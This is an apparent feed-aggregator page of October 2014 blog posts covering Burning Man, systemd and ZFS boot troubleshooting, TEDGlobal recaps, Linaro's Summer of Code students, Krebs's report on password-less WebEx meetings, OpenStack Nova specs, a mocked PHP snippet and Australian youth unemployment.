    Harvey and others made the decision to relocate the event to the dramatic but inhospitable environment of the Black Rock Desert in Pershing Country, Nevada. This changed the scale of the event and opened up a world of possibilities for Burning Man to become the festival it is today. It has grown in size, budget, ambition, and notoriety virtually every year since moving to Nevada. Along the way it went legit, fully permitted and coordination with county governments and the Bureau of Land Management.

    And through it all Larry Harvey has been a part of steering and scaling up this arts oasis in the desert. He serves as Burning Man’s Chief Philosophical Officer and authored the Ten Principles in 02004, guidelines which reflect “the community’s ethos and culture” and assure Burning Man a reference point as it grows in Black Rock and all over the world. Harvey continues also as founding Board Member of the Burning Man Art Project and Chairman of the Board of the Black Rock Arts Foundation.

    <iframe allowfullscreen="" frameborder="0" height="315" src="http://www.youtube-nocookie.com/embed/xxRAg9Pcpm4?rel=0" width="560"></iframe>

    There have been rough spots along the way, as the man has grown from eight to over 100 feet and a 20 person party on the beach has become 60,000+ paying hundreds of dollars per ticket. Over the years much has changed and many issues have stirred concern in the community that the festival could be destroyed by some new policy or other development: “Scaling up will kill Burning Man.”  “That new rule will kill Burning Man.”  “The Bureau of Land Management will kill Burning Man.”  “Selling tickets that way will kill Burning Man.”  “Board infighting will kill Burning Man.”  “Upscale turnkey camps will kill Burning Man.”

    It turns out none of these things killed Burning Man, and Burning Man shows few signs of slowing down. The Black Rock Arts Foundation (BRAF) gives hundreds of thousands of dollars in grants every year to Burning Man projects as well as public art projects in San Francisco and around the world. The “regional burns” have created strong communities globally based around smaller satellite festivals which take cues from the Ten Principles.

    A few examples of the art that BRAF has helped make possible:

    Raygun Gothic Rocketship photo by David Yu

    The Raygun Gothic Rocketship in San Francisco by Five Ton Crane (5TC) photo by David Yu

    Soma at Burning Man photo by Scott Hess

    Flaming Lotus Girls’ Soma at Burning Man photo by Scott Hess

    The Dandelion photo George Post

    From Market Street Blooms by Karen Cusolito at UN Plaza, San Francisco photo by George Post

    The Bottlecap Gazebo in Fernley, Nevada; photo courtesy of Jerry Mansker

    The Bottlecap Gazebo by Max Poynton and Andrew Grinberg in Fernley, Nevada; photo courtesy of Jerry Mansker

    Join us on Monday, October 20th at SFJAZZ Center as Larry Harvey, who has been there from the beginning to the present, tells the story of Burning Man and shows us how we can find long-term thinking in a reoccurring temporary city.

    This Seminar is sold out, but there will be a walk-up line for released tickets.

     

    Planet DebianKonstantinos Margaritis: SIMD optimizations, cont.

    A friend of mine told me that I should advertise my passion and know-how about SIMD more, and I decided to follow his advice. Though I am terrible at marketing and even more at personal marketing, I've made an attempt to do just that, advertise the fact that I'm offering SIMD Optimization Services (with emphasis on PowerPC AltiVec/VMX/VSX, and ARM NEON, but I'm ok with SSE as well, the logic is pretty much the same, though the difference(s) are in the details). For this reason I'm offering a free evaluation of your performance critical code (open/closed, able to sign NDAs if needed) to let you know if it's worth optimizing it, what kind of a performance gain you would get and how much it would cost you to get that result.
    You can read more here.

    Planet DebianJohn Goerzen: Update on the systemd issue

    The other day, I wrote about my poor first impressions of systemd in jessie. Here’s an update.

    I’d like to start with the things that are good. I found the systemd community to be one of the most helpful in Debian, and #debian-systemd IRC channel to be especially helpful. I was in there for quite some time yesterday, and appreciated the help from many people, especially Michael. This is a nontechnical factor, but is extremely important; this has significantly allayed my concerns about systemd right there.

    There are things about the systemd design that impress. The dependency system and configuration system is a lot more flexible than sysvinit. It is also a lot more complicated, and difficult to figure out what’s happening. I am unconvinced of the utility of parallelization of boot to begin with; I rarely reboot any of my Linux systems, desktops or servers, and it seems to introduce needless complexity.

    Anyhow, on to the filesystem problem, and a bit of a background. My laptop runs ZFS, which is somewhat similar to btrfs in that it’s a volume manager (like LVM), RAID manager (like md), and filesystem in one. My system runs LVM, and inside LVM, I have two ZFS “pools” (volume groups): one, called rpool, that is unencrypted and holds mainly the operating system; and the other, called crypt, that is stacked atop LUKS. ZFS on Linux doesn’t yet have built-in crypto, which is why LVM is even in the picture here (to separate out the SSD at a level above ZFS to permit parts of it to be encrypted). This is a bit of an antiquated setup for me; as more systems have AES-NI, I’m going to everything except /boot being encrypted.

    Anyhow, inside rpool is the / filesystem, /var, and /usr. Inside /crypt is /tmp and /home.

    Initially, I tried to just boot it, knowing that systemd is supposed to work with LSB init scripts, and ZFS has init scripts with carefully-planned dependencies. This was evidently not working, perhaps because /lib/systemd/systemd/ It turns out that systemd has a few assumptions that turn out to be less true with ZFS than otherwise. ZFS filesystems are normally not mounted via /etc/fstab; a ZFS pool has internal properties about which dataset gets mounted where (similar to LVM’s actions after a vgscan and vgchange -ay). Even though there are ordering constraints in the units, systemd is writing files to /var before /var gets mounted, resulting in the mount failing (unlike ext4, ZFS by default will reject an attempt to mount over a non-empty directory). Partly this due to the debian-fixup.service, and partly it is due to systemd reacting to udev items like backlight.

    This problem was eventually worked around by doing zfs set mountpoint=legacy rpool/var, and then adding a line to fstab (“rpool/var /var zfs defaults 0 2″) for /var and its descendent filesystems.

    This left the problem of /tmp; again, it wasn’t getting mounted soon enough. In this case, it required crypttab to be processed first, and there seem to be a lot of bugs in the crypttab processing in systemd (more on that below). I eventually worked around that by adding After=cryptsetup.target to the zfs-import-cache.service file. For /tmp, it did NOT work to put it in /etc/fstab, because then it tried to mount it before starting cryptsetup for some reason. It probably didn’t help that the system’s cryptdisks.service is a symlink to /dev/null, a fact I didn’t realize until after a lot of needless reboots.

    Anyhow, one thing I stumbled across was poor console control with systemd. On numerous occasions, I had things like two cryptsetup processes trying to read a password, plus an emergency mode console trying to do so. I had this memorable line of text at one point:

    (or type Control-D to continue): Please enter passphrase for disk athena-crypttank (crypt)! [ OK ] Stopped Emergency Shell.

    And here we venture into unsatisfying territory with systemd. One answer to this in IRC was to install plymouth, which apparently serializes console I/O. However, plymouth is “an attractive boot animation in place of the text messages that normally get shown.” I don’t want an “attractive boot animation”. Nevertheless, neither systemd-sysv nor cryptsetup depends on plymouth, so by default, the prompt for a password at boot is obscured by various other text.

    Worse, plymouth doesn’t support serial consoles, so at the moment booting a system that uses LUKS with systemd over a serial console is a matter of blind luck of typing the right password at the right time.

    In the end, though, the system booted and after a few more tweaks, the backlight buttons do their thing again. Whew!

    Update 2014-10-13: uau pointed out that Plymouth is more than a bootsplash, and can work with serial consoles, despite the description of the package. I stand corrected on that. (It is still the case, however, that packages don’t depend on it where they should, and the default experience for people using cryptsetup is not very good.)

    TED12 visions of Brazil, from 12 different creatives

    To introduce the sessions of TEDGlobal 2014, curator Bruno Giussani had an idea: he asked 12 different creative teams to give 12 different visions of Brazil. Below, watch them all in rapid succession.

    <iframe allowfullscreen="true" class="youtube-player" frameborder="0" height="360" src="http://www.youtube.com/embed/KOP_99kr_hQ?version=3&amp;rel=1&amp;fs=1&amp;showsearch=0&amp;showinfo=1&amp;iv_load_policy=1&amp;wmode=transparent" type="text/html" width="586"></iframe>

    <iframe allowfullscreen="true" class="youtube-player" frameborder="0" height="360" src="http://www.youtube.com/embed/iUHFmqt1nzc?version=3&amp;rel=1&amp;fs=1&amp;showsearch=0&amp;showinfo=1&amp;iv_load_policy=1&amp;wmode=transparent" type="text/html" width="586"></iframe>

    <iframe allowfullscreen="true" class="youtube-player" frameborder="0" height="360" src="http://www.youtube.com/embed/3zy8WlXYt_w?version=3&amp;rel=1&amp;fs=1&amp;showsearch=0&amp;showinfo=1&amp;iv_load_policy=1&amp;wmode=transparent" type="text/html" width="586"></iframe>

    <iframe allowfullscreen="true" class="youtube-player" frameborder="0" height="360" src="http://www.youtube.com/embed/AJfnxAaHzbE?version=3&amp;rel=1&amp;fs=1&amp;showsearch=0&amp;showinfo=1&amp;iv_load_policy=1&amp;wmode=transparent" type="text/html" width="586"></iframe>

    <iframe allowfullscreen="true" class="youtube-player" frameborder="0" height="360" src="http://www.youtube.com/embed/mtHD5jByDKc?version=3&amp;rel=1&amp;fs=1&amp;showsearch=0&amp;showinfo=1&amp;iv_load_policy=1&amp;wmode=transparent" type="text/html" width="586"></iframe>

    <iframe allowfullscreen="true" class="youtube-player" frameborder="0" height="360" src="http://www.youtube.com/embed/Qb2eDIGIexM?version=3&amp;rel=1&amp;fs=1&amp;showsearch=0&amp;showinfo=1&amp;iv_load_policy=1&amp;wmode=transparent" type="text/html" width="586"></iframe>

    <iframe allowfullscreen="true" class="youtube-player" frameborder="0" height="360" src="http://www.youtube.com/embed/vplWNB0PEL8?version=3&amp;rel=1&amp;fs=1&amp;showsearch=0&amp;showinfo=1&amp;iv_load_policy=1&amp;wmode=transparent" type="text/html" width="586"></iframe>

    <iframe allowfullscreen="true" class="youtube-player" frameborder="0" height="360" src="http://www.youtube.com/embed/djw3d--MmSw?version=3&amp;rel=1&amp;fs=1&amp;showsearch=0&amp;showinfo=1&amp;iv_load_policy=1&amp;wmode=transparent" type="text/html" width="586"></iframe>

    <iframe allowfullscreen="true" class="youtube-player" frameborder="0" height="360" src="http://www.youtube.com/embed/0b1Q6Qg3FuU?version=3&amp;rel=1&amp;fs=1&amp;showsearch=0&amp;showinfo=1&amp;iv_load_policy=1&amp;wmode=transparent" type="text/html" width="586"></iframe>

    <iframe allowfullscreen="true" class="youtube-player" frameborder="0" height="360" src="http://www.youtube.com/embed/Nm5dmyoYyrE?version=3&amp;rel=1&amp;fs=1&amp;showsearch=0&amp;showinfo=1&amp;iv_load_policy=1&amp;wmode=transparent" type="text/html" width="586"></iframe>

    <iframe allowfullscreen="true" class="youtube-player" frameborder="0" height="360" src="http://www.youtube.com/embed/CYMpgQw2guw?version=3&amp;rel=1&amp;fs=1&amp;showsearch=0&amp;showinfo=1&amp;iv_load_policy=1&amp;wmode=transparent" type="text/html" width="586"></iframe>

    <iframe allowfullscreen="true" class="youtube-player" frameborder="0" height="360" src="http://www.youtube.com/embed/GSZOqZ8wXak?version=3&amp;rel=1&amp;fs=1&amp;showsearch=0&amp;showinfo=1&amp;iv_load_policy=1&amp;wmode=transparent" type="text/html" width="586"></iframe>

    <iframe allowfullscreen="true" class="youtube-player" frameborder="0" height="360" src="http://www.youtube.com/embed/bX7gt1bo8gg?version=3&amp;rel=1&amp;fs=1&amp;showsearch=0&amp;showinfo=1&amp;iv_load_policy=1&amp;wmode=transparent" type="text/html" width="586"></iframe>

     


    Planet DebianSteve McIntyre: Successful Summer of Code in Linaro

    It's past time I wrote about how Linaro's students fared in this year's Google Summer of Code. You might remember me posting earlier in the year when we welcomed our students. We started with 3 student projects at the beginning of the summer. One of the students unfortunately didn't work out, but the other two were hugely successful.

    Gaurav Minocha was a graduate student at the University of British Columbia, Vancouver, Canada. He worked on Linux Flattened Device Tree Self-checking, mentored by Grant Likely from Linaro's Office of the CTO. Gaurav achieved all of his project's goals, and he was invited to Linaro's recent Linaro Connect USAConnect conference in California to meet people and and talk about his project. He and Grant presented a session on their work; it was filmed, and video is online. Grant said he was very happy with Gaurav's "strong, solid performance" during the project.

    Varad Gautam was a student at Birla Institute of Technology and Science, Pilani, India. He succeeded in porting UEFI to the BeagleBone Black. Leif Lindholm from the Linaro Enterprise Group was his mentor for the summer. At the end of the summer, Varad delivered a UEFI port ready for booting Linux and his code was included in Linaro's September UEFI release. Leif said that he was "very pleased with Varad's self sufficiency and ability to pick up an entirely new software project very quickly". We were hoping to invite Gaurad to Connect in California also, but travel document delays got in the way. With luck we'll see him at the next Connect in Hong Kong in February 2015.

    Well done, guys! It was great to work with these young developers for the summer, and we wish them lots more success in their future endeavours.

    Google have also just confirmed that they will be running the Summer of Code program again in 2015. I'm hoping that Linaro will be accepted again next year as a mentoring organisation. I'll post more about that early next year.

    Sociological ImagesReported Sex Offenses Rise in Response to Reform at Occidental College

    In 2013, after years of trying to reform the institution from the inside, faculty and students at my college submitted two complaints to the federal government. The combined 330 pages allege sexual harassment, assault, and battery on campus and argue that the college has ignored and silenced victims, mishandled adjudication and, at times, protected men found responsible for assault. We are now under federal investigation.

    Forcibly revealing Occidental College’s failings hasn’t been fun for anyone, but it has changed us. It is now easier to report assaults, we are likely more vigilant about recording those reports, and students have more knowledge about their rights. Here is what happened:

    2

    At The Occidental Weekly, Noel Hemphill writes that reports of sexual offenses have skyrocketed. They rose from 12 in 2011 to 64 in 2013. Over half of the cases reported were of incidents that occurred in previous years. That’s normal — victims often take a year or more to decide to come forward — but may also reflect a new desire by survivors to have their experience recorded in official statistics.

    These numbers are disturbing, but it is unlikely that they reflect a rise in sexual offenses. Instead, they suggest that survivors of assault are feeling more empowered, have greater faith in their institution, and are pushing for recognition and change.

    Lisa Wade is a professor of sociology at Occidental College and the co-author of Gender: Ideas, Interactions, Institutions. You can follow her on Twitter and Facebook.

    (View original at http://thesocietypages.org/socimages)

    Krebs on SecurityWho’s Watching Your WebEx?

    KrebsOnSecurity spent a good part of the past week working with Cisco to alert more than four dozen companies — many of them household names — about regular corporate WebEx conference meetings that lack passwords and are thus open to anyone who wants to listen in.

    Department of Energy's WebEx meetings.

    Department of Energy’s WebEx meetings.

    At issue are recurring video- and audio conference-based meetings that companies make available to their employees via WebEx, a set of online conferencing tools run by Cisco. These services allow customers to password-protect meetings, but it was trivial to find dozens of major companies that do not follow this basic best practice and allow virtually anyone to join daily meetings about apparently internal discussions and planning sessions.

    Many of the meetings that can be found by a cursory search within an organization’s “Events Center” listing on Webex.com seem to be intended for public viewing, such as product demonstrations and presentations for prospective customers and clients. However, from there it is often easy to discover a host of other, more proprietary WebEx meetings simply by clicking through the daily and weekly meetings listed in each organization’s “Meeting Center” section on the Webex.com site.

    Some of the more interesting, non-password-protected recurring meetings I found include those from Charles Schwab, CSC, CBS, CVS, The U.S. Department of Energy, Fannie Mae, Jones Day, Orbitz, Paychex Services, and Union Pacific. Some entities even also allowed access to archived event recordings.

    Cisco began reaching out to each of these companies about a week ago, and today released an all-customer alert (PDF) pointing customers to a consolidated best-practices document written for Cisco WebEx site administrators and users.

    “In the first week of October, we were contacted by a leading security researcher,” Cisco wrote. “He showed us that some WebEx customer sites were publicly displaying meeting information online, including meeting Time, Topic, Host, and Duration. Some sites also included a ‘join meeting’ link.”

    Omar Santos, senior incident manager of Cisco’s product security incident response team, acknowledged that the company’s customer documentation for securing WebEx meetings had previously been somewhat scattered across several different Cisco online properties.  But Santos said the default setting for its WebEx meetings has always been for a password to be included on a meeting when created.

    “If there is a meeting you can find online without a password, it means the site administrator or the meeting creator has elected not to include a password,” Santos said. “Only if the site administrator has elected to allow no passwords can the meeting organizer choose the ability to have no passwords on that meeting.”

    Update, 11:24 a.m. ET: Cisco has published a blog post about this as well, available here.

    TEDBold expeditions: A recap of session 12 of TEDGlobal 2014

    Aakash Odedra performs at TEDGlobal 2014. Photo: James Duncan Davidson/TED

    Aakash Odedra performs at TEDGlobal 2014. Photo: James Duncan Davidson/TED

    In the final session of TEDGlobal 2014, Mighty spaces, we take four journeys — three to great expanses in the world, and one into our minds and hearts:

    A low blue haze lights the stage as choreographer Aakash Odedra spins slowly. The light grows and his dance picks up — a mix of classical Indian forms and modern interpretations. Then, from a simple, whirling dance, Odedra’s performance becomes a storm of wind, light and fluttering papers, creating bird-like formations in the air and on the screen behind him — which he controls with a Kinect as he darts through the tempest. Beautiful and dramatic, Odedra’s dance fills the room with its pulsing presence.

    French Buddhist monk Matthieu Ricard has lived as a scientist, an author and the official French translator for the Dalai Lama. After years of talking with leaders, economists and neuroscientists, he believes that however complex the question may be politically, economically or scientifically, the answer boils down to a simple choice of altruism or selfishness. Ask yourself: What would the caring, considerate response be in this situation? Then, do that.

    “I’m addicted to adventure,” says Fabien Cousteau, the grandson of Jacques Cousteau and a well-known ocean explorer in his own right. “I think the oceans still hold quite a few secrets,” he says. “If we’re going to explore the final frontier of this planet, we need to live there.” That’s just what Cousteau and his team did for a month this summer with Mission 31. They lived aboard Aquarius, an underwater lab chained to the bottom of the ocean off the coast of Florida, and conducted the equivalent of three years’ worth of scientific research in the span of 31 days. On the TED stage, he shares images and high-speed video of the very different view of animals they got living among them — we see an endangered goliath grouper (that barks!) and a rose sponge (which unfurls quicker than the eye can see). While this mission beat his grandfather’s underwater-living record by one day, Cousteau says that it wasn’t just about setting a record or even just about the science but about creating a visceral connection to the ocean. “My grandfather used to say, people protect what they love,” he says. [Read a Q&A with Cousteau about what he learned living underwater.]

    Ethnobotanist Mark Plotkin is dedicated to protecting the uncontacted tribes of the world. He believes we should all be awed by the unlocked skills and knowledge of shamans and plant masters – but that the last thing we should do is intrude on their lives. Having worked for years in the most remote places in the Colombian rainforest, Plotkin has seen its beauty firsthand – the man-eating crocodile, the world’s biggest anteater, the, er, magical frogs. But life there is under threat — from illegal gold mining, illegal logging, narco-trafficking, hunting and fishing, trade and transport — and the wildlife and local tribes are in danger. Says Plotkin, “Every time a shaman dies it’s like a library burning down.” That’s why he started the Amazon Conservation Team, to introduce technology to already contacted indigenous groups, in culturally sensitive ways that don’t affect their lifestyle, and that help them protect other tribes.

    For the final talk of TEDGlobal 2014, we head south – all the way south. Polar explorer Robert Swan is the first man “stupid enough” — his words — to ever walk to both the North and South poles, and he is deeply worried about the great ice melt in Antarctica. Ice chunks the size of small nations are breaking away from Antarctica — meaning that sea levels will rise at least one meter in the next century. In an impassioned call for preserving the “one beautiful, pristine place left on Earth,” Swan outlines the dangers presented to the Antarctic and his vision for the future: It’s protected now by an international treaty, but that treaty ends in 2041, the blink of an eye in treaty terms. He hopes that by 2041, world leaders will be committed to recycling, sustainability and renewable energy, which will save our last continent.

    Robert Swan speaks at TEDGlobal 2014. Photo: James Duncan Davidson/TED

    Robert Swan speaks at TEDGlobal 2014. Photo: James Duncan Davidson/TED


    TEDIn case you missed it: Day 4 of TEDGlobal 2014

    (L-R) Host Chris Anderson speaks with Chikwe Ihekweazu at TEDGlobal 2014. Photo: James Duncan Davidson/TED

    (L-R) Host Chris Anderson speaks with Chikwe Ihekweazu at TEDGlobal 2014. Photo: James Duncan Davidson/TED

    TEDGlobal 2014 has wrapped up — here, some highlights from the last day of the conference. Onstage and online, it’s been a busy and fantastic Friday.

    Word spreads of Malala Yousafzai’s Nobel Peace Prize. Excitement was high at TEDGlobal this morning when the news came out that the 2014 Nobel Peace Prize had gone jointly to Pakistani education activist Malala Yousafzai (the youngest-ever winner of the prize) and Indian children’s rights activist Kailash Satyarthi. Malala’s father spoke at TED earlier this year, sharing her cause in person; Malala spoke on video, because she’d vowed never to miss a day of school again. But what about the acceptance of her Nobel prize? Nope, she didn’t miss a day of school for that either.

    Some Ebola real talk, courtesy of Chikwe Ihekweazu. In a conversation with Chris Anderson, the public health expert shares two astonishing maps that explain why this is the worst outbreak of Ebola the world has ever dealt with: public health spending isn’t happening where the infectious diseases are.“For Ebola to cause an outbreak, it probably picked the best two or three countries to happen in,” he said. He shares some ways you can help.

    Kimberley Motley drops an incredibly justified F-bomb onstage. As an American litigator in Afghanistan, Kimberley Motley protects people often neglected by Afghan society. In her fight for justice, she sees some things very much worth getting angry about — including the case of Sahar Gul, who at age 12 was sold by “her f*$#ing brother” into forced marriage in a family who brutally tortured her. Using laws that had existed for years but had never once been enforced, Gul was the first domestic violence victim to be represented by a lawyer in Afghanistan. In every word of this jaw-dropping talk, Motley evidenced the passion and brilliance that she brings to her important work. [Read a recap of this talk.]

    Aakash Odedra performs at TEDGlobal 2014. Photo: James Duncan Davidson/TED

    Aakash Odedra performs at TEDGlobal 2014. Photo: James Duncan Davidson/TED

    Aakash Odedra gets caught in a storm of knowledge. The mesmerizing dancer fuses modern dance with classical Indian forms in a performance that starts calmly in a haze of blue light. His twirling soon speeds up into a whirlwind of light and paper, creating bird-like formations projected onto the screen behind him. Odedra controls this frenzied scene with a Kinect, breathing an otherworldly energy into the room.

    Three talks from this week’s conference are now live on TED.com. Thanks to amazing work by TED’s film editors and production team, three talks this week came straight from Rio. Pia Mancini’s talk on democracy for the Internet era, Dilip Ratha’s talk on global remittances and Glenn Greenwald’s talk on the importance of privacy were given heroic overnight edits and posted as TED Talks on the homepage. These ideas that made an impact at the conference can now be shared with all! Look for more soon.

    Get highlights from TEDGlobal, Day 1 >>
    Get highlights from TEDGlobal, Day 2 >>
    Get highlights from TEDGlobal, Day 3 >>


    RacialiciousLive From IndieCade: Let’s Do Something About It

    By Arturo R. García

    Top row, L-R: Moderator Shawn Alexander Allen, TJ Thomas, Racialicious owner Latoya Peterson. Bottom row, L-R: Catt Small, Ashley Alicea, Fatima Zenine Villanueva.

    This past weekend saw our owner and publisher Latoya Peterson speak on a panel at IndieCade, a festival and conference celebrating independent game development.

    Moderator Shawn Alexander Allen (Treachery in Beatdown City) said that the discussion, “Let’s Do Something About It,” grew from a talk about race and gaming he gave at last year’s event. Joining them on the panel:

    A Storify of the panel is under the cut.

    <iframe frameborder="no" height="750" src="http://storify.com/aboynamedart/live-from-indiecade-let-s-do-something-about-it/embed?border=false" width="100%"></iframe><script src="http://storify.com/aboynamedart/live-from-indiecade-let-s-do-something-about-it.js?border=false"></script>

    <noscript>[View the story "Live From Indiecade: Let's Do Something About It" on Storify]</noscript>

    [Top image: Screenshot from Six Sides of the World by Cybernetik Design, via Indiecade Facebook page]

    The post Live From IndieCade: Let’s Do Something About It appeared first on Racialicious - the intersection of race and pop culture.

    CryptogramHow James Bamford Came to Write The Puzzle Palace

    Interesting essay about James Bamford and his efforts to publish The Puzzle Palace over the NSA's objections. Required reading for those who think the NSA's excesses are somehow new.

    Planet Linux AustraliaMichael Still: One week of Nova Kilo specifications

    Its been one week of specifications for Nova in Kilo. What are we seeing proposed so far? Here's a summary...

    API



    Administrative

    • Enable the nova metadata cache to be a shared resource to improve the hit rate: review 126705.


    Containers Service



    Hypervisor: FreeBSD

    • Implement support for FreeBSD networking in nova-network: review 127827.


    Hypervisor: Hyper-V

    • Allow volumes to be stored on SMB shares instead of just iSCSI: review 102190.


    Hypervisor: VMWare

    • Add ephemeral disk support to the VMware driver: review 126527 (spec approved).
    • Add support for the HTML5 console: review 127283.
    • Allow Nova to access a VMWare image store over NFS: review 126866.
    • Enable administrators and tenants to take advantage of backend storage policies: review 126547 (spec approved).
    • Support the OVA image format: review 127054.


    Hypervisor: libvirt

    • Add a new linuxbridge VIF type, macvtap: review 117465.
    • Add support for SMBFS as a image storage backend: review 103203.
    • Convert to using built in libvirt disk copy mechanisms for cold migrations on non-shared storage: review 126979.
    • Support libvirt storage pools: review 126978.
    • Support quiesce filesystems during snapshot: review 126966.


    Instance features

    • Allow direct access to LVM volumes if supported by Cinder: review 127318.


    Interal

    • Move flavor data out of the system_metdata table in the SQL database: review 126620.


    Internationalization



    Scheduler

    • Add an IOPS weigher: review 127123 (spec approved).
    • Allow limiting the flavors that can be scheduled on certain host aggregates: review 122530.
    • Create an object model to represent a request to boot an instance: review 127610.
    • Decouple services and compute nodes in the SQL database: review 126895.
    • Implement resource objects in the resource tracker: review 127609.
    • Move select_destinations() to using a request object: review 127612.


    Scheduling

    • Add instance count on the hypervisor as a weight: review 127871.


    Security

    • Provide a reference implementation for console proxies that uses TLS: review 126958.
    • Strongly validate the tenant and user for quota consuming requests with keystone: review 92507.


    Tags for this post: openstack kilo blueprints spec
    Related posts: Compute Kilo specs are open; Blueprints to land in Nova during Juno; On layers; My candidacy for Kilo Compute PTL; Juno nova mid-cycle meetup summary: nova-network to Neutron migration; Juno Nova PTL Candidacy

    Comment

    Worse Than FailureCodeSOD: We Don't Need no Stinking Elses

    We've all seen it before. I dare say we've all been a party to it.

    First, we look at a block of code that needs to be modified. Then we determine which criteria needs to be added to address the case that we've been tasked to implement. Next, we add the condition and walk away before the waft from the code smell reaches our nostrils. Over time, a monstrosity like the following arises from the depths. Not something that couldn't be greatly improved by some fava beans and a nice refactor. I'm sure the unit tests that cover your production code base will ensure that your refactoring was successful. Right? Right??

    <script type="text/javascript">
       var pageRefresh = true;
       steps_completed[1] = true;
       steps_completed[2] = true;
       if(!$.getCookie('select_level') ) $.setCookie("select_level", 2, 1); 
       if($_SESSION['UserData']['step2'] == true) echo 'steps_completed[3] = true; if(pageRefresh == false) $.setCookie("select_level", 3, 1);'; //it games from register.php
       if($_SESSION['UserData']['step3'] == true) echo 'steps_completed[4] = true; if(pageRefresh == false) $.setCookie("select_level", 4, 1);'; //it games from eshop.php
       if($_POST['register']) echo 'steps_completed[2] = true;$.setCookie("select_level", 2, 1);'; //if i only update my data
       if($_POST['register'] && $this->registerClient->registerClient->getMessage('register_success')) echo '$.setCookie("select_level", 3, 1);'; //if i update data and continue next step 
       if($_GET['auth'] == 'true' && $_SESSION['logged']) echo 'steps_completed[3] = true;$.setCookie("select_level", 3, 1);'; //if i only update my data
       if($_POST['add_financial'] && $_SESSION['logged']) echo 'steps_completed[3] = true;$.setCookie("select_level", 3, 1);'; //if i only update my data 
       if($_POST['add_financial'] && $_SESSION['logged'] && $this->getMessage('financial_success')) echo '$.setCookie("select_level", 4, 1);'; //if i update data and continue next step
       if($_GET['add_financial'] == 'true' && $_SESSION['logged']) echo '$.setCookie("select_level", 4, 1);'; //if i update data and continue next step 
       if($_POST['to_step_2'] && $_SESSION['logged']) echo '$.setCookie("select_level", 2, 1);'; //if i update data and continue next step //if steps1,2,3 is restricted
       if($this->getError('have_order') || $this->getError('have_notcompleted_order')) {
          echo '$.setCookie("select_level", 4, 1);';
          echo 'steps_completed[1] = false;';
          echo 'steps_completed[2] = false;';
          echo 'steps_completed[3] = false;';
          echo 'steps_completed[4] = true;';
       }
    </script>

     

    Photo credit: Foter / CC BY-SA

    Kelvin ThomsonYouth Unemployment Levels Risk a Lost Generation

    Youth unemployment must be one of the highest priorities for all levels of Government if we are to secure our economic, skills, social and environmental future as a nation. The sad fact is youth unemployment has been rising over recent years on the watch of the free market neo liberal Federal and State Governments, whose policies of withdrawing investment from our manufacturing industry, cutting investment from our higher education, skills, TAFEs and secondary education sectors, proceeding with harsh welfare reforms, and ramping up migrant worker programs, are hurting Australian young peoples’ chances to find and keep a job. <o:p></o:p>

    Unemployment figures released on October 8th show Australia’s unemployment rate at 6.1%, with almost 30,000 jobs lost in September. The reason why the unemployment rate is not rising higher is because of a 0.2% fall in the participation rate to 64.5%. Victoria’s unemployment rate is at 6.8%, the highest in 13 years.  Unemployment in Victoria is growing 12 times faster than new jobs. It’s increased from 4.9 per cent in December 2010 to 6.8 per cent today. Almost 68,000 more people are out of work. Youth unemployment is at a 15 year high; on average as of July at 13.8% up from 12.3% last year. <o:p></o:p>

    As reported in the Moreland Leader(29/9/14) youth unemployment in the northwest is 17.2%, up from 13.1% last year, driven by the Global Financial Crisis (GFC) and job cuts in the retail and hospitality sectors. Compounding these issues are the cuts by the Liberal Government to our manufacturing industry, including Ford, Holden, and Toyota, such as the $500 million cut from the Automotive Transformation Scheme. The possible offshoring of Australia’s new submarine fleet will further hurt our manufacturing sector, along with the Government’s failure to develop a domestic gas industry. The billions of dollars in cuts by the Liberal Federal and State Governments to our skills, training, TAFE, higher education, secondary and primary education sectors will hamper job opportunities for young people. Punishing young people by making them ineligible for Centrelink New Start Allowance, will only place more obstacles rather than real job opportunities in front of young people.<o:p></o:p>

    The fact that the first job advertised for the East-West Link Tunnel Project is for a 457 Migrant Worker Visa Coordinator is extraordinary. Apparently it does not matter that Victoria has its highest unemployment rate in 13 years, apparently it does not matter that youth unemployment in Melbourne’s North-West is now over 17%, and apparently it does not matter that we already have over a million non-Australians in Australia on temporary visas which give them work rights.<o:p></o:p>

    Victoria’s economy has not been creating enough jobs to cope with the state’s booming population growth. Between December 2010 and August 2014, the number of working aged Victorians (aged 15 and over) swelled by 303,200, equivalent to 6,891 people added every month. Over that four year period to August 2014, manufacturing employment in Victoria dropped by 11,600. Over the same period, employment in construction fell by 13,900, while retail sector employment increased 21,300, healthcare employment by 29,100 and education and training employment by 8,000.<o:p></o:p>
    <o:p> </o:p>
    Victoria’s traditional manufacturing and large industry jobs base is evaporating. Even in these new emerging sectors such as health and education, young Victorians face stiff competition from overseas workers. Despite the rhetoric that high skilled migration is needed for the mining and agriculture sectors, the reality is a high proportion of migrant workers come to Victoria. The Skilled Migration Program grew from 125,755 places on 2011-12 to 128,973 in 2012-13. In 1995-96 the Skilled Migration Program was just 24,100. The Occupations with the highest number of primary visa grants were professionals (4,656 or 51.1%) and technicians and trade workers (2,416 or 26.5%) in the 457 Visa Class. Under the Skill Stream, there were professionals 6,083 (65.5%) and technicians and trades with 1,502 (16.2%). According to the Department of Immigration and Border Protection’s State and Territory Migration Summary Report of March 2014, Victoria absorbed the second largest proportion of 457 visa grants in the first three quarters of 2013-14 with 23% or 17,432 people. Under the Skill Stream Victoria took in 19.3% (19,976 people). <o:p></o:p>

    Yet as reported by Nick McKenzie and Richard Baker in The Ageon 7th August 2014, as many as 9 in 10 skilled migrant visas may be fraudulent. A 2010 investigation concluded that around 90 per cent or more than 40,000 visa applications in the General Skilled Migration Program lodged per year for the previous three years were suspect. A 2009 investigation concluded that the student visa program was failing, the general skilled migration program was failing, and the falsifying of qualifications was prolific.<o:p></o:p>

    Sir Robert Menzies said on 2nd October 1964 at the opening of Chrysler Manufacturing Centre in Tonsley Park South Australia:<o:p></o:p>

    “…I don’t need to be told that there are quite a number of people here, as I go around, who are what we used to call New Australians, who are people who migrated here since the war. There are millions now- anyhow, something well over one million- in Australia, and every large factory I go to contains a high percentage of people who have come in these years. There could not have been an immigration policy or programme without employment on this scale in industries of this kind. The rural industries, vital as they are to the survival of Australia, can’t employ people by the scores of thousands extra every year. We know they cant. It is industries of this kind which enable the migration programme to continue, and the fact that the migration programme continues, that you have remarkable increase in the population every year by year has given strength and tone and optimism to the people who run retail stores in Australia, to all sorts of other manufacturers who produce things that are in demand by stores and which are bought by them because they are in demand by their ordinary customers. This is the whole interwoven structure”.<o:p></o:p>

